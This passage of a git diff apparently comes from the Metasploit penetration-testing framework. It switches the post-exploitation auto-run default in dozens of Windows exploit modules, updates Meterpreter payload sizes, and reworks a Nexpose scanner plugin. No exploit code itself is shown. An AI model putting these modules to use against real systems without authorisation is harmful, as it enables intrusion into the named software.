           'DisablePayloadHandler' => 'true',
         },
       'Payload'        =>
diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb
index 6bc77221ec..e41db7aeae 100644
--- a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb
+++ b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC'             => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
           'DisablePayloadHandler' => 'true',
         },
       'Payload'        =>
diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb
index 5e519cd03f..d2af4a71e4 100644
--- a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb
+++ b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC'             => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
           'DisablePayloadHandler' => 'true',
         },
       'Payload'        =>
diff --git a/modules/exploits/windows/fileformat/adobe_libtiff.rb b/modules/exploits/windows/fileformat/adobe_libtiff.rb
index d7a76340f7..1382f09a30 100644
--- a/modules/exploits/windows/fileformat/adobe_libtiff.rb
+++ b/modules/exploits/windows/fileformat/adobe_libtiff.rb
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
           'DisablePayloadHandler' => 'true',
         },
       'Payload'        =>
diff --git a/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb b/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb
index 4e643c9134..3452aced1e 100644
--- a/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb
+++ b/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'         =>
         {
diff --git a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb
index e7c7606b63..5f09b2be60 100644
--- a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb
+++ b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform'       => 'win',
       'Payload'        =>
diff --git a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb
index 4ef262a804..e2a17b49a4 100644
--- a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb
+++ b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'           =>
         {
diff --git a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb
index 24283fda76..668d94bf17 100644
--- a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb
+++ b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'seh',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb
index 485b6ba9d9..611d2f21e1 100644
--- a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb
+++ b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
         {
           'EXITFUNC'          => "process",
           'DisablePayloadHandler' => 'true',
-          'InitialAutoRunScript'  => 'migrate -f'
+          'InitialAutoRunScript'  => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
index 189433c05f..c5c6b9af07 100644
--- a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
+++ b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'thread',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/http/cogent_datahub_command.rb b/modules/exploits/windows/http/cogent_datahub_command.rb
index 2fb6931fe2..6d7f539b48 100644
--- a/modules/exploits/windows/http/cogent_datahub_command.rb
+++ b/modules/exploits/windows/http/cogent_datahub_command.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Stance'      => Msf::Exploit::Stance::Aggressive,
       'DefaultOptions' => {
         'WfsDelay' => 30,
-        'InitialAutoRunScript' => 'migrate -f'
+        'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
       },
       'Targets'     =>
         [
diff --git a/modules/exploits/windows/http/cyclope_ess_sqli.rb b/modules/exploits/windows/http/cyclope_ess_sqli.rb
index 3ce543f576..b9bc3c016c 100644
--- a/modules/exploits/windows/http/cyclope_ess_sqli.rb
+++ b/modules/exploits/windows/http/cyclope_ess_sqli.rb
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb
index e219d739fc..7e7beb92f2 100644
--- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb
+++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => "seh",
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform' => 'win',
       'Targets'  =>
diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb
index 241ec0cf1a..ed854078fd 100644
--- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb
+++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => "seh",
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform' => 'win',
       'Targets'  =>
diff --git a/modules/exploits/windows/http/hp_nnm_ovas.rb b/modules/exploits/windows/http/hp_nnm_ovas.rb
index 8982d9bbbe..cb1cb33e23 100644
--- a/modules/exploits/windows/http/hp_nnm_ovas.rb
+++ b/modules/exploits/windows/http/hp_nnm_ovas.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
         {
           'WfsDelay' => 45,
           'EXITFUNC' => 'thread',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload' =>
         {
diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb
index 37d8c6bd7d..983dab3561 100644
--- a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb
+++ b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => "seh",
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform' => 'win',
       'Targets'	 =>
diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb
index 47d8108ede..f3be23758f 100644
--- a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb
+++ b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb
@@ -66,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => "seh",
-          "InitialAutoRunScript" => "migrate -f",
+          "InitialAutoRunScript" => "post/windows/manage/priv_migrate",
         },
       'Platform' => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/misc/citrix_streamprocess.rb b/modules/exploits/windows/misc/citrix_streamprocess.rb
index b67a2c6433..cd7a9bfb62 100644
--- a/modules/exploits/windows/misc/citrix_streamprocess.rb
+++ b/modules/exploits/windows/misc/citrix_streamprocess.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
         {
           # best at delaying/preventing target crashing post-exploit
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb
index e67cc1e95e..b3b75c9574 100644
--- a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb
+++ b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb
index 5d48e0a692..202b6351b9 100644
--- a/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb
+++ b/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb
index 373922133a..a3ac4f3342 100644
--- a/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb
+++ b/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb
index 8741273ee4..2a453e4651 100644
--- a/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb
+++ b/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/misc/itunes_extm3u_bof.rb b/modules/exploits/windows/misc/itunes_extm3u_bof.rb
index f1f6199933..677ab83852 100644
--- a/modules/exploits/windows/misc/itunes_extm3u_bof.rb
+++ b/modules/exploits/windows/misc/itunes_extm3u_bof.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => ['win'],
       'Arch'           => ARCH_X86,
diff --git a/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb b/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb
index 99c952ef24..1def1adc90 100644
--- a/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb
+++ b/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
           'EXITFUNC' => 'process'
         },
       'Payload'        =>
diff --git a/modules/exploits/windows/misc/splayer_content_type.rb b/modules/exploits/windows/misc/splayer_content_type.rb
index 42ab69a938..9c6d3dcffb 100644
--- a/modules/exploits/windows/misc/splayer_content_type.rb
+++ b/modules/exploits/windows/misc/splayer_content_type.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC'         => "seh",
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/misc/stream_down_bof.rb b/modules/exploits/windows/misc/stream_down_bof.rb
index 6975c8e264..1bd28765a2 100644
--- a/modules/exploits/windows/misc/stream_down_bof.rb
+++ b/modules/exploits/windows/misc/stream_down_bof.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'seh',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb
index ebf8b5f23c..3dd0997aaa 100644
--- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb
+++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb
@@ -64,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'seh',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb
index 7eb98360a0..20b75e5f6b 100644
--- a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb
+++ b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/scada/daq_factory_bof.rb b/modules/exploits/windows/scada/daq_factory_bof.rb
index dc3b814a0a..95f61cef26 100644
--- a/modules/exploits/windows/scada/daq_factory_bof.rb
+++ b/modules/exploits/windows/scada/daq_factory_bof.rb
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb
index 9461c4b2e5..b956075708 100644
--- a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb
+++ b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC'         => "seh",
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/scada/moxa_mdmtool.rb b/modules/exploits/windows/scada/moxa_mdmtool.rb
index d416fd0189..cf80ea00a2 100644
--- a/modules/exploits/windows/scada/moxa_mdmtool.rb
+++ b/modules/exploits/windows/scada/moxa_mdmtool.rb
@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'thread',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/scada/scadapro_cmdexe.rb b/modules/exploits/windows/scada/scadapro_cmdexe.rb
index 9da0341ab1..cdf1c9f123 100644
--- a/modules/exploits/windows/scada/scadapro_cmdexe.rb
+++ b/modules/exploits/windows/scada/scadapro_cmdexe.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/scada/winlog_runtime.rb b/modules/exploits/windows/scada/winlog_runtime.rb
index d7ddb592f7..7d1fce97df 100644
--- a/modules/exploits/windows/scada/winlog_runtime.rb
+++ b/modules/exploits/windows/scada/winlog_runtime.rb
@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/payloads/singles/python/meterpreter_bind_tcp.rb b/modules/payloads/singles/python/meterpreter_bind_tcp.rb
index a3fcc1aa9c..97facf0f25 100644
--- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb
@@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_python'
 
 module MetasploitModule
 
-  CachedSize = 51794
+  CachedSize = 53182
 
   include Msf::Payload::Single
   include Msf::Payload::Python
diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb
index cd25b0ac8f..f1676e35df 100644
--- a/modules/payloads/singles/python/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb
@@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_python'
 
 module MetasploitModule
 
-  CachedSize = 51758
+  CachedSize = 53142
 
   include Msf::Payload::Single
   include Msf::Payload::Python
diff --git a/modules/payloads/singles/python/meterpreter_reverse_https.rb b/modules/payloads/singles/python/meterpreter_reverse_https.rb
index 43e6c7353c..60fc42cc2b 100644
--- a/modules/payloads/singles/python/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb
@@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_python'
 
 module MetasploitModule
 
-  CachedSize = 51758
+  CachedSize = 53146
 
   include Msf::Payload::Single
   include Msf::Payload::Python
diff --git a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
index 6f208583f8..0aa4f083af 100644
--- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
@@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_python'
 
 module MetasploitModule
 
-  CachedSize = 51714
+  CachedSize = 53098
 
   include Msf::Payload::Single
   include Msf::Payload::Python
diff --git a/plugins/nexpose.rb b/plugins/nexpose.rb
index 570c01a602..20b710b630 100644
--- a/plugins/nexpose.rb
+++ b/plugins/nexpose.rb
@@ -5,8 +5,7 @@
 #
 # $Revision$
 #
-
-require 'rapid7/nexpose'
+require 'nexpose'
 
 module Msf
   Nexpose_yaml = "#{Msf::Config.get_config_root}/nexpose.yaml" #location of the nexpose.yml containing saved nexpose creds
@@ -81,7 +80,7 @@ class Plugin::Nexpose < Msf::Plugin
       group = "default"
 
       if ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0))
-        config = {"#{group}" => {'username' => @user, 'password' => @pass, 'server' => @host, 'port' => @port}}
+        config = {"#{group}" => {'username' => @user, 'password' => @pass, 'server' => @host, 'port' => @port, 'trust_cert' => @trust_cert}}
         ::File.open("#{Nexpose_yaml}", "wb") { |f| f.puts YAML.dump(config) }
         print_good("#{Nexpose_yaml} created.")
       else
@@ -100,21 +99,21 @@ class Plugin::Nexpose < Msf::Plugin
           @pass = lconfig['default']['password']
           @host = lconfig['default']['server']
           @port = lconfig['default']['port']
-          @sslv = "ok" # TODO: Not super-thrilled about bypassing the SSL warning...
+          @trust_cert = lconfig['default']['trust_cert']
+          unless @trust_cert
+            @sslv = "ok" # TODO: Not super-thrilled about bypassing the SSL warning...
+          end
           nexpose_login
           return
         end
       end
 
       if(args.length == 0 or args[0].empty? or args[0] == "-h")
-        print_status("Usage: ")
-        print_status("       nexpose_connect username:password@host[:port] <ssl-confirm>")
-        print_status("        -OR- ")
-        print_status("       nexpose_connect username password host port <ssl-confirm>")
+        nexpose_usage
         return
       end
 
-      @user = @pass = @host = @port = @sslv = nil
+      @user = @pass = @host = @port = @sslv = @trust_cert = @trust_cert_file = nil
 
       case args.length
       when 1,2
@@ -122,31 +121,48 @@ class Plugin::Nexpose < Msf::Plugin
         @user,@pass = cred.split(':', 2)
         targ ||= '127.0.0.1:3780'
         @host,@port = targ.split(':', 2)
-        port ||= '3780'
-        @sslv = args[1]
+        @port ||= '3780'
+        unless args.length == 1
+          @trust_cert_file = args[1]
+          if File.exists? @trust_cert_file
+            @trust_cert = File.read(@trust_cert_file)
+          else
+            @sslv = @trust_cert_file
+          end
+        end
       when 4,5
-        @user,@pass,@host,@port,@sslv = args
+        @user,@pass,@host,@port,@trust_cert = args
+        unless args.length == 4
+          @trust_cert_file = @trust_cert
+          if File.exists? @trust_cert_file
+            @trust_cert = File.read(@trust_cert_file)
+          else
+            @sslv = @trust_cert_file
+          end
+        end
       else
-        print_status("Usage: ")
-        print_status("       nexpose_connect username:password@host[:port] <ssl-confirm>")
-        print_status("        -OR- ")
-        print_status("       nexpose_connect username password host port <ssl-confirm>")
+        nexpose_usage
         return
       end
       nexpose_login
     end
 
+    def nexpose_usage
+      print_status("Usage: ")
+      print_status("       nexpose_connect username:password@host[:port] <ssl-confirm || trusted_cert_file>")
+      print_status("        -OR- ")
+      print_status("       nexpose_connect username password host port <ssl-confirm || trusted_cert_file>")
+    end
+
     def nexpose_login
 
       if ! ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0))
-        print_status("Usage: ")
-        print_status("       nexpose_connect username:password@host[:port] <ssl-confirm>")
-        print_status("        -OR- ")
-        print_status("       nexpose_connect username password host port <ssl-confirm>")
+        nexpose_usage
         return
       end
 
-      if(@host != "localhost" and @host != "127.0.0.1" and @sslv != "ok")
+      if(@host != "localhost" and @host != "127.0.0.1" and (@trust_cert.nil? && @sslv != "ok"))
+        # consider removing this message and replacing with check on trust_store, and if trust_store is not found validate @host already has a truly trusted cert?
         print_error("Warning: SSL connections are not verified in this release, it is possible for an attacker")
         print_error("         with the ability to man-in-the-middle the Nexpose traffic to capture the Nexpose")
         print_error("         credentials. If you are running this on a trusted network, please pass in 'ok'")
@@ -154,7 +170,7 @@ class Plugin::Nexpose < Msf::Plugin
         return
       end
 
-      # Wrap this so a duplicate session doesnt prevent a new login
+      # Wrap this so a duplicate session does not prevent a new login
       begin
         cmd_nexpose_disconnect
       rescue ::Interrupt
@@ -164,7 +180,7 @@ class Plugin::Nexpose < Msf::Plugin
 
       begin
         print_status("Connecting to Nexpose instance at #{@host}:#{@port} with username #{@user}...")
-        nsc = ::Nexpose::Connection.new(@host, @user, @pass, @port)
+        nsc = Nexpose::Connection.new(@host, @user, @pass, @port, nil, nil, @trust_cert)
         nsc.login
       rescue ::Nexpose::APIError => e
         print_error("Connection failed: #{e.reason}")
@@ -190,21 +206,21 @@ class Plugin::Nexpose < Msf::Plugin
       end
 
       scans.each do |scan|
-        print_status("    Scan ##{scan[:scan_id]} is running on Engine ##{scan[:engine_id]} against site ##{scan[:site_id]} since #{scan[:start_time].to_s}")
+        print_status("    Scan ##{scan.scan_id} is running on Engine ##{scan.engine_id} against site ##{scan.site_id} since #{scan.start_time.to_s}")
       end
     end
 
     def cmd_nexpose_sites(*args)
       return if not nexpose_verify
 
-      sites = @nsc.site_listing || []
+      sites = @nsc.list_sites || []
       case sites.length
       when 0
         print_status("There are currently no active sites on this Nexpose instance")
       end
 
       sites.each do |site|
-        print_status("    Site ##{site[:site_id]} '#{site[:name]}' Risk Factor: #{site[:risk_factor]} Risk Score: #{site[:risk_score]}")
+        print_status("    Site ##{site.id} '#{site.name}' Risk Factor: #{site.risk_factor} Risk Score: #{site.risk_score}")
       end
     end
 
@@ -217,24 +233,24 @@ class Plugin::Nexpose < Msf::Plugin
         return
       end
 
-      devices = @nsc.site_device_listing(site_id) || []
+      devices = @nsc.list_site_devices(site_id) || []
       case devices.length
       when 0
         print_status("There are currently no devices within this site")
       end
 
       devices.each do |device|
-        print_status("    Host: #{device[:address]} ID: #{device[:device_id]} Risk Factor: #{device[:risk_factor]} Risk Score: #{device[:risk_score]}")
+        print_status("    Host: #{device.address} ID: #{device.id} Risk Factor: #{device.risk_factor} Risk Score: #{device.risk_score}")
       end
     end
 
     def cmd_nexpose_report_templates(*args)
       return if not nexpose_verify
 
-      res = @nsc.report_template_listing || []
+      res = @nsc.list_report_templates || []
 
       res.each do |report|
-        print_status("    Template: #{report[:template_id]} Name: '#{report[:name]}' Description: #{report[:description]}")
+        print_status("    Template: #{report.id} Name: '#{report.name}' Description: #{report.description}")
       end
     end
 
@@ -286,17 +302,12 @@ class Plugin::Nexpose < Msf::Plugin
       report_formats = ["raw-xml-v2", "ns-xml"]
       report_format  = report_formats.shift
 
-      report = Nexpose::ReportConfig.new(@nsc)
-      report.set_name("Metasploit Export #{msfid}")
-      report.set_template_id("pentest-audit")
-
-      report.addFilter("SiteFilter", site_id)
-      report.set_generate_after_scan(0)
-      report.set_storeOnServer(1)
+      report = Nexpose::ReportConfig.build(@nsc, site_id, "Metasploit Export #{msfid}", "pentest-audit", report_format, true)
+      report.delivery = Nexpose::Delivery.new(true)
 
       begin
-        report.set_format(report_format)
-        report.saveReport()
+        report.format = report_format
+        report.save(@nsc)
       rescue ::Exception => e
         report_format = report_formats.shift
         if report_format
@@ -306,17 +317,18 @@ class Plugin::Nexpose < Msf::Plugin
       end
 
       print_status("Generating the export data file...")
-      url = nil
-      while(! url)
-        url = @nsc.report_last(report.config_id)
+      last_report = nil
+      while(! last_report)
+        last_report = @nsc.last_report(report.id)
         select(nil, nil, nil, 1.0)
       end
+      url = last_report.uri
 
       print_status("Downloading the export data...")
       data = @nsc.download(url)
 
       # Delete the temporary report ID
-      @nsc.report_config_delete(report.config_id)
+      @nsc.delete_report_config(report.id)
 
       print_status("Importing Nexpose data...")
       process_nexpose_data(report_format, data)
@@ -389,8 +401,10 @@ class Plugin::Nexpose < Msf::Plugin
         when "-c"
           if (val =~ /^([^:]+):([^:]+):(.+)/)
             type, user, pass = [ $1, $2, $3 ]
-            newcreds = Nexpose::AdminCredentials.new
-            newcreds.setCredentials(type, nil, nil, user, pass, nil)
+            msfid = Time.now.to_i
+            newcreds = Nexpose::SiteCredentials.for_service("Metasploit Site Credential #{msfid}", nil, nil, nil, nil, type)
+            newcreds.user_name = user
+            newcreds.password = pass
             opt_credentials << newcreds
           else
             print_error("Unrecognized Nexpose scan credentials: #{val}")
